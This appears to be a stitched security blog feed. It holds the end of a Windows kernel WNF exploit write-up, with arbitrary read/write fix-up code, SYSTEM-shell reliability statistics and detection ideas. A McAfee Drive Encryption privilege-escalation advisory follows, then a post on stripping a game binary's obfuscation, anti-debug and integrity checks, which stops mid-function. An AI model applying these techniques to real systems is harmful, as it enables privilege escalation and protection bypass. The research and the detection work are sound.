15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT

As you can see there is a member TemporaryNamesListHead which is a linked list of the addresses of the TemporaryNamesListHead within the _WNF_NAME_INSTANCE.

Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.

We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).

An example of this is:

/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{

    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    LPVOID first = read64((char*)wnf_process_context_ptr + 0x40);
    LPVOID ptr; 

    for (ptr = read64(read64((char*)wnf_process_context_ptr + 0x40)); ; ptr = read64(ptr))
    {
        if (ptr == first) return;

        // +0x088 TemporaryNameListEntry : _LIST_ENTRY
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}

NTOSKRNL Base Address

Whilst this isn’t actually needed by the exploit, I had the need to obtain NTOSKRNL base address to speed up some examinations and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, then the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into the wait state, we can then walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.

The following output shows the thread whilst in the wait state:

0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14

Exploit Testing and Statistics

As there are some elements of instability and non-deterministic elements of this exploit, then an exploit testing framework was developed to determine the effectiveness across multiple runs and on multiple different supported platforms and by varying the exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with potentially other third party drivers etc installed and a more noisy kernel pool, it gives some indication of this approach is feasible and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

  • Spray size
  • Post-exploitation choices

All these are measured over 100 iterations of the exploit (over 5 runs) for a timeout duration of 15 seconds (i.e. a BSOD did not occur within 15 seconds of an execution of the exploit).

SYSTEM shells – Number of times a SYSTEM shell was launched.

Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.

Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.

Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the max number of overflow attempts. 32 was chosen a semi-arbitrary value based on empirical testing and the blocks in the BlockBitmap for the LFH being scanned by groups of 32 blocks.

BSODs on exec – Number of times the exploit BSOD the box on execution.

Unmapped Read – Number of times the relative read reaches unmapped memory (ExpWnfReadStateData) – included in the BSOD on exec count above.

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 85 82 76 75 75 78
Total LFH writes 708 726 707 678 624 688
Avg LFH writes 8 8 9 9 8 8
Failed after 32 1 3 2 1 1 2
BSODs on exec 14 15 22 24 24 20
Unmapped Read 4 5 8 6 10 7

Spray size 6000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 80 78 84 79 81
Total LFH writes 674 643 696 762 706 696
Avg LFH writes 8 8 9 9 8 8
Failed after 32 2 4 3 3 4 3
BSODs on exec 14 16 19 13 17 16
Unmapped Read 2 4 4 5 4 4

Spray size 10000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 85 87 85 86 85
Total LFH writes 805 714 761 688 694 732
Avg LFG writes 9 8 8 8 8 8
Failed after 32 3 5 3 3 3 3
BSODs on exec 13 10 10 12 11 11
Unmapped Read 1 0 1 1 0 1

Spray size 20000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 89 90 94 90 90 91
Total LFH writes 624 763 657 762 650 691
Avg LFG writes 7 8 7 8 7 7
Failed after 32 3 2 1 2 2 2
BSODs on exec 8 8 5 8 8 7
Unmapped Read 0 0 0 0 1 0

From this was can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read (due to the page not being mapped) and thus reducing the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post exploitation method used (token stealing vs modifying the existing token). The reason for this is that performing the token stealing method there are more kernel reads/writes and a longer time duration between reverting PreviousMode.

20000 spray size

With all the _SEP_TOKEN_PRIVILEGES enabled:

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
PRIV shells 94 92 93 92 89 92
Total LFH writes 939 825 825 788 724 820
Avg LFG writes 9 8 8 8 8 8
Failed after 32 2 2 1 2 0 1
BSODs on exec 4 6 6 6 11 6
Unmapped Read 0 1 1 2 2 1

Therefore, there is only negligible difference these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well firstly there is a patch out for this vulnerability since the 8th of June 2021. If your reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on 🙂

However, there are some engineering insights which can be gained from this and in general detecting memory corruption exploits within the wild. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post exploitation technique detection (token stealing etc) which have been covered in many online articles. As I never had access to the in the wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should allow security researchers a greater understanding in this area.

The main artifacts from this exploit are:

  • NTFS Extended Attributes being created and queried.
  • WNF objects being created (as part of the spray)
  • Failed exploit attempts leading to BSODs

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace:

As this vulnerability can be exploited a low integrity (and thus from a sandbox), then the detection mechanisms would vary based on if an attacker had local code execution or chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser render process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome while loading a new tab and web page did not trigger either of the events too. I didn’t explore too deeply if there were any render operations which could trigger this non-maliciously but provides a place where defenders can explore further.

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.

Crash Dump Telemetry

Crash Dumps are a very good way to detect unreliable exploitation techniques or if an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. This was found by looking for shellcode, however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes too.

In the case of this specific vulnerability when being exploited with WNF, there is a slim chance (approx. <5%) that the following BSOD can occur which could act a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution. Once kernel code execution has been gained or SYSTEM, they may just disable the telemetry or sanitise it afterwards – especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios when this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.

At this point we now have an exploit which is much more succesful and less likely to cause instability on the target system than a simple POC. However, we can only get about 90%~ success rate due to the techniques used. This seems to be about the limit with this approach and without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and detection of memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.

Technical Advisory – NULL Pointer Derefence in McAfee Drive Encryption (CVE-2021-23893)

4 October 2021 at 15:37
Vendor: McAfee
Vendor URL: https://kc.mcafee.com/corporate/index?page=content&id=sb10361
Versions affected: Prior to 7.3.0 HF1
Systems Affected: Windows OSs without NULL page protection 
Author: Balazs Bucsay <balazs.bucsay[ at ]nccgroup[.dot.]com> @xoreipeip
CVE Identifier: CVE-2021-23893
Risk: 8.8 - CWE-269: Improper Privilege Management

Summary

McAfee’s Complete Data Protection package contained the Drive Encryption (DE) software. This software was used to transparently encrypt the drive contents. The versions prior to 7.3.0 HF1 had a vulnerability in the kernel driver MfeEpePC.sys that could be exploited on certain Windows systems for privilege escalation or DoS.

Impact

Privilege Escalation vulnerability in a Windows system driver of McAfee Drive Encryption (DE) prior to 7.3.0 could allow a local non-admin user to gain elevated system privileges via exploiting an unutilized memory buffer.

Details

The Drive Encryption software’s kernel driver was loaded to the kernel at boot time and certain IOCTLs were available for low-privileged users.

One of the available IOCTL was referencing an event that was set to NULL before initialization. In case the IOCTL was called at the right time, the procedure used NULL as an event and referenced the non-existing structure on the NULL page.

If the user mapped the NULL page and created a fake structure there that mimicked a real Even structure, it was possible to manipulate certain regions of the memory and eventually execute code in the kernel.

Recommendation

Install or update Disk Encryption 7.3.0 HF1, which has this vulnerability fixed.

Vendor Communication

February 24, 2021: Vulnerability was reported to McAfee

March 9, 2021: McAfee was able to reproduce the crash with the originally provided DoS exploit

October 1, 2021: McAfee released the new version of DE, which fixes the issue

Acknowledgements

Thanks to the Cedric Halbronn for his support during the development of the exploit.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. 

Published date:  October 4, 2021

Written by:  Balazs Bucsay

A Look At Some Real-World Obfuscation Techniques

12 October 2021 at 13:00

Among the variety of penetration testing engagements NCC Group delivers, some – often within the gaming industry – require performing the assignment in a blackbox fashion against an obfuscated binary, and the client’s priorities revolve more around evaluating the strength of their obfuscation against content protection violations, rather than exercising the application’s security boundaries.

The following post aims at providing insight into the tools and methods used to conduct those engagements using real-world examples. While this approach allows for describing techniques employed by actual protections, only a subset of the material can be explicitly listed here (see disclaimer for more information).

Unpacking Phase

When first attempting to analyze a hostile binary, the first step is generally to unpack the actual contents of its sections from runtime memory. The standard way to proceed consists of letting the executable run until the unpacking stub has finished deobfuscating, decompressing and/or deciphering the executable’s sections. The unpacked binary can then be reconstructed, by dumping the recovered sections into a new executable and (usually) rebuilding the imports section from the recovered IAT(Import Address Table).

This can be accomplished in many ways including:

  • Debugging manually and using plugins such as Scylla to reconstruct the imports section
  • Python scripting leveraging Windows debugging libraries like winappdbg and executable file format libraries like pefile
  • Intel Pintools dynamically instrumenting the binary at run-time (JIT instrumentation mode recommended to avoid integrity checks)

Expectedly, these approaches can be thwarted by anti-debug mechanisms and various detection mechanisms which, in turn, can be evaded via more debugger plugins such as ScyllaHide or by implementing various hooks such as those highlighted by ICPin. Finally, the original entry point of the application can usually be identified by its immediate calls to canonical C++ language’s internal initialization functions such as _initterm() and _initterm_e.

While the dynamic method is usually sufficient, the below samples highlight automated implementations that were successfully used via a python script to handle a simple packer that did not require imports rebuilding, and a versatile (albeit slower) dynamic execution engine implementation allowing a more granular approach, fit to uncover specific behaviors.

Control Flow Flattening

Once unpacked, the binary under investigation exposes a number of functions obfuscated using control flow graph (CFG) flattening, a variety of antidebug mechanisms, and integrity checks. Those can be identified as a preliminary step by running instrumented under ICPin (sample output below).

Overview

When disassembled, the CFG of each obfuscated function exhibits the pattern below: a state variable has been added to the original flow, which gets initialized in the function prologue and the branching structure has been replaced by a loop of pointer table-based dispatchers (highlighted in white).

Each dispatch loop level contains between 2 and 16 indirect jumps to basic blocks (BBLs) actually implementing the function’s logic.

There are a number of ways to approach this problem, but the CFG flattening implemented here can be handled using a fully symbolic approach that does not require a dynamic engine, nor a real memory context. The first step is, for each function, to identify the loop using a loop-matching algorithm, then run a symbolic engine through it, iterating over all the possible index values and building an index-to-offset map, with the original function’s logic implemented within the BBL-chains located between the blocks belonging to the loop:

Real Destination(s) Recovery

The following steps consist of leveraging the index-to-offset map to reconnect these BBL-chains with each other, and recreate the original control-flow graph. As can be seen in the captures below, the value of the state variable is set using instruction-level obfuscation. Some BBL-chains only bear a static possible destination which can be swiftly evaluated.

For dynamic-destination BBL-chains, once the register used as a state variable has been identified, the next step is to identify the determinant symbols, i.e, the registers and memory locations (globals or local variables) that affect the value of the state register when re-entering the dispatch loop.

This can be accomplished by computing the intermediate language representation (IR) of the assembly flow graph (or BBLs) and building a dependency graph from it. Here we are taking advantage of a limitation of the obfuscator: the determinants for multi-destination BBLs are always contained within the BBL subgraph formed between two dispatchers.

With those determinants identified, the task that remains is to identify what condition these determinants are fulfilling, as well as what destinations in code we jump to once the condition has been evaluated. The Z3 SMT solver from Microsoft is traditionally used around dynamic symbolic engines (DSE) as a means to finding input values leading to new paths. Here, the deobfusactor uses its capabilities to identify the type of comparison the instructions are replacing.

For example, for the equal pattern, the code asks Z3 if 2 valid destination indexes (D1 and D2) exist such that:

  • If the determinants are equal, the value of the state register is equal to D1
  • If the determinants are different, the value of the state register is equal to D2

Finally, the corresponding instruction can be assembled and patched into the assembly, replacing the identified patterns with equivalent assembly sequences such as the ones below, where

  • mod0 and mod1 are the identified determinants
  • #SREG is the state register, now free to be repurposed to store the value of one of the determinants (which may be stored in memory):
  • #OFFSET0 is the offset corresponding to the destination index if the tested condition is true
  • #OFFSET1 is the offset corresponding to the destination index if the tested condition is false
class EqualPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JZ    #OFFSET0
NOP
JMP   #OFFSET1
'''

class UnsignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JA    #OFFSET0
NOP
JMP   #OFFSET1
'''

class SignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JG    #OFFSET0
NOP
JMP   #OFFSET1
'''

The resulting CFG, since every original block has been reattached directly to its real target(s), effectively separates the dispatch loop from the significant BBLs. Below is the result of this first pass against a sample function:

This approach does not aim at handling all possible theoretical cases; it takes advantage of the fact that the obfuscator only transforms a small set of arithmetic operations.

Integrity Check Removal

Once the flow graph has been unflattened, the next step is to remove the integrity checks. These can mostly be identified using a simple graph matching algorithm (using Miasm’s “MatchGraphJoker” expressions) which also constitutes a weakness in the obfuscator. In order to account for some corner cases, the detection logic implemented here involves symbolically executing the identified loop candidates, and recording their reads against the .text section in order to provide a robust identification.

On the above graph, the hash verification flow is highlighted in yellow and the failure case (in this case, sending the execution to an address with invalid instructions) in red. Once the loop has been positively identified, the script simply links the green basic blocks to remove the hash check entirely.

“Dead” Instructions Removal

The resulting assembly is unflattened, and does not include the integrity checks anymore, but still includes a number of “dead” instructions which do not have any effect on the function’s logic and can be removed. For example, in the sample below, the value of EAX is not accessed between its first assignment and its subsequent ones. Consequently, the first assignment of EAX, regardless of the path taken, can be safely removed without altering the function’s logic.

start:
    MOV   EAX, 0x1234
    TEST  EBX, EBX
    JNZ   path1
path0:
    XOR   EAX, EAX
path1:
    MOV   EAX, 0x1

Using a dependency graph (depgraph) again, but this time, keeping a map of ASM <-> IR (one-to-many), the following pass removes the assembly instructions for which the depgraph has determined all corresponding IRs are non-performative.

Finally, the framework-provided simplifications, such as bbl-merger can be applied automatically to each block bearing a single successor, provided the successor only has a single predecessor. The error paths can also be identified and “cauterized”, which should be a no-op since they should never be executed but smoothen the rebuilding of the executable.

A Note On Antidebug Mechanisms

While a number of canonical anti-debug techniques were identified in the samples; only a few will be covered here as the techniques are well-known and can be largely ignored.

PEB->isBeingDebugged

In the example below, the function checks the PEB for isBeingDebugged (offset 0x2) and send the execution into a stack-mangling loop before continuing execution which is leads to a certain crash, obfuscating context from a naive debugging attempt.

Debug Interrupts

Another mechanism involves debug software interrupts and vectored exception handlers, but is rendered easily comprehensible once the function has been processed. The code first sets two local variables to pseudorandom constant values, then registers a vectored exception handler via a call to AddVectoredExceptionHandler. An INT 0x3 (debug interrupt) instruction is then executed (via the indirect call to ISSUE_INT3_FN), but encoded using the long form of the instruction: 0xCD 0x03.

After executing the INT 0x3 instruction, the code flow is resumed in the exception handler as can be seen below.

If the exception code from the EXCEPTION_RECORD structure is a debug breakpoint, a bitwise NOT is applied to one of the constants stored on stack. Additionally, the Windows interrupt handler handles every debug exception assuming they stemmed from executing the short version of the instruction (0xCC), so were a debugger to intercept the exception, those two elements need to be taken into consideration in order for execution to continue normally.

Upon continuing execution, a small arithmetic operation checks that the addition of one of the initially set constants (0x8A7B7A99) and a third one (0x60D7B571) is equal to the bitwise NOT of the second initial constant (0x14ACCFF5), which is the operation performed by the exception handler.

0x8A7B7A99 + 0x60D7B571 == 0xEB53300AA == ~0x14ACCFF5

A variant using the same exception handler operates in a very similar manner, substituting the debug exception with an access violation triggered via allocating a guard page and accessing it (this behavior is also flagged by ICPin).

Rebuilding The Executable

Once all the passes have been applied to all the obfuscated functions, the patches can be recorded, then applied to a free area of the new executable, and a JUMP is inserted at the function’s original offset.

Example of a function before and after deobfuscation:

Obfuscator’s Integrity Checking Internals

It is generally unnecessary to dig into the details of an obfuscator’s integrity checking mechanism; most times, as described in the previous example, identifying its location or expected result is sufficient to disable it. However, this provides a good opportunity to demonstrate the use of a DSE to address an obfuscator’s internals – theoretically its most hardened part.

ICPin output immediately highlights a number of code locations performing incremental reads on addresses in the executable’s .text section. Some manual investigation of these code locations points us to the spot where a function call or branching instruction switches to the obfuscated execution flow. However, there are no clearly defined function frames and the entire set of executed instructions is too large to display in IDA.

In order to get a sense of the execution flow, a simple jitter callback can be used to gather all the executed blocks as the engine runs through the code. Looking at the discovered blocks, it becomes apparent that the code uses conditional instructions to alter the return address on the stack, and hides its real destination with opaque predicates and obfuscated logic.

Starting with that information, it would be possible to take a similar approach as in the previous example and thoroughly rebuild the IR CFG, apply simplifications, and recompile the new assembly using LLVM. However, in this instance, armed with the knowledge that this obfuscated code implements an integrity check, it is advantageous to leverage the capabilities of a DSE.

A CFG of the obfuscated flow can still be roughly computed, by recording every block executed and adding edges based on the tracked destinations. The stock simplifications and SSA form can be used to obtain a graph of the general shape below:

Deciphering The Data Blobs

On a first run attempt, one can observe 8-byte reads from blobs located in two separate memory locations in the .text section, which are then processed through a loop (also conveniently identified by the tracking engine). With the memX symbols representing constants in memory, and blob0 representing the sequentially read input from a 32bit ciphertext blob, the symbolic values extracted from the blobs look as follows, looping 32 times:

res = (blob0 + ((mem1 ^ mem2)*mul) + sh32l((mem1 ^ mem2), 0x5)) ^ (mem3 + sh32l(blob0, 0x4)) ^ (mem4 + sh32r(blob0,  0x5))

Inspection of the values stored at memory locations mem1 and mem2 reveals the following constants:

@32[0x1400DF45A]: 0xA46D3BBF
@32[0x14014E859]: 0x3A5A4206

0xA46D3BBF^0x3A5A4206 = 0x9E3779B9

0x9E3779B9 is a well-known nothing up my sleeve number, based on the golden ratio, and notably used by RC5. In this instance however, the expression points at another Feistel cipher, TEA, or Tiny Encryption Algorithm:

void decrypt (uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }
    v[0]=v0; v[1]=v1;
}

Consequently, the 128-bit key can be trivially recovered from the remaining memory locations identified by the symbolic engine.

Extracting The Offset Ranges

With the decryption cipher identified, the next step is to reverse the logic of computing ranges of memory to be hashed. Here again, the memory tracking execution engine proves useful and provides two data points of interest:
– The binary is not hashed in a continuous way; rather, 8-byte offsets are regularly skipped
– A memory region is iteratively accessed before each hashing

Using a DSE such as this one, symbolizing the first two bytes of the memory region and letting it run all the way to the address of the instruction that reads memory, we obtain the output below (edited for clarity):

-- MEM ACCESS: {BLOB0 & 0x7F 0 8, 0x0 8 64} + 0x140000000
# {BLOB0 0 8, 0x0 8 32} & 0x80 = 0x0
...

-- MEM ACCESS: {(({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32} 0 32, 0x0 32 64} + 0x140000000
# 0x0 = ({BLOB0 0 8, 0x0 8 32} & 0x80)?(0x0,0x1)
# ((({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32}) == 0xFFFFFFFF = 0x0
...

The accessed memory’s symbolic addresses alone provide a clear hint at the encoding: only 7 of the bits of each symbolized byte are used to compute the address. Looking further into the accesses, the second byte is only used if the first byte’s most significant bit is not set, which tracks with a simple unsigned integer base-128 compression. Essentially, the algorithm reads one byte at a time, using 7 bits for data, and using the last bit to indicate whether one or more byte should be read to compute the final value.

Identifying The Hashing Algorithm

In order to establish whether the integrity checking implements a known hashing algorithm, despite the static disassembly showing no sign of known constants, a memory tracking symbolic execution engine can be used to investigate one level deeper. Early in the execution (running the obfuscated code in its entirety may take a long time), one can observe the following pattern, revealing well-known SHA1 constants.

0x140E34F50 READ @32[0x140D73B5D]: 0x96F977D0
0x140E34F52 READ @32[0x140B1C599]: 0xF1BC54D1
0x140E34F54 READ @32[0x13FC70]: 0x0
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD0]: 0x67452301

0x140E34F50 READ @32[0x140D73B61]: 0x752ED515
0x140E34F52 READ @32[0x140B1C59D]: 0x9AE37E9C
0x140E34F54 READ @32[0x13FC70]: 0x1
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD4]: 0xEFCDAB89

0x140E34F50 READ @32[0x140D73B65]: 0xF9396DD4
0x140E34F52 READ @32[0x140B1C5A1]: 0x6183B12A
0x140E34F54 READ @32[0x13FC70]: 0x2
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD8]: 0x98BADCFE

0x140E34F50 READ @32[0x140D73B69]: 0x2A1B81B5
0x140E34F52 READ @32[0x140B1C5A5]: 0x3A29D5C3
0x140E34F54 READ @32[0x13FC70]: 0x3
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCDC]: 0x10325476

0x140E34F50 READ @32[0x140D73B6D]: 0xFB95EF83
0x140E34F52 READ @32[0x140B1C5A9]: 0x38470E73
0x140E34F54 READ @32[0x13FC70]: 0x4
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCE0]: 0xC3D2E1F0

Examining the relevant code addresses (as seen in the SSA notation below), it becomes evident that, in order to compute the necessary hash constants, a simple XOR instruction is used with two otherwise meaningless constants, rendering algorithm identification less obvious from static analysis alone.

And the expected SHA1 constants are stored on the stack:

0x96F977D0^0xF1BC54D1 ==> 0x67452301
0x752ED515^0x9AE37E9C ==> 0XEFCDAB89
0xF9396DD4^0x6183B12A ==> 0X98BADCFE
0x2A1B81B5^0x3A29D5C3 ==> 0X10325476
0xFB95EF83^0x38470E73 ==> 0XC3D2E1F0

Additionally, the SHA1 algorithm steps can be further observed in the SSA graph, such as the ROTL-5 and ROTL-30 operations, plainly visible in the IL below.

Final Results

The entire integrity checking logic recovered from the obfuscator implemented in Python below was verified to produce the same digest, as when running under the debugger, or a straightforward LLVM jitter. The parse_ranges() function handles the encoding, while the accumulate_bytes() generator handles the deciphering and processing of both range blobs and skipped offset blobs.

Once the hashing of the memory ranges dictated by the offset table has completed, the 64bit values located at the offsets deciphered from the second blob are subsequently hashed. Finally, once the computed hash value has been successfully compared to the valid digest stored within the RWX .text section of the executable, the execution flow is deemed secure and the obfuscator proceeds to decipher protected functions within the .text section.

def parse_ranges(table):
  ranges = []
  rangevals = []
  tmp = []
  for byte in table:
    tmp.append(byte)
    if not byte&0x80:
      val = 0
      for i,b in enumerate(tmp):
        val |= (b&0x7F)<<(7*i)
      rangevals.append(val)
      tmp = [] # reset
  offset = 0
  for p in [(rangevals[i], rangevals[i+1]) for i in range(0, len(rangevals), 2)]:
    offset += p[0]
    if offset == 0xFFFFFFFF:
      break
    ranges.append((p[0], p[1]))
    offset += p[1]
  return ranges

def accumulate_bytes(r, s):
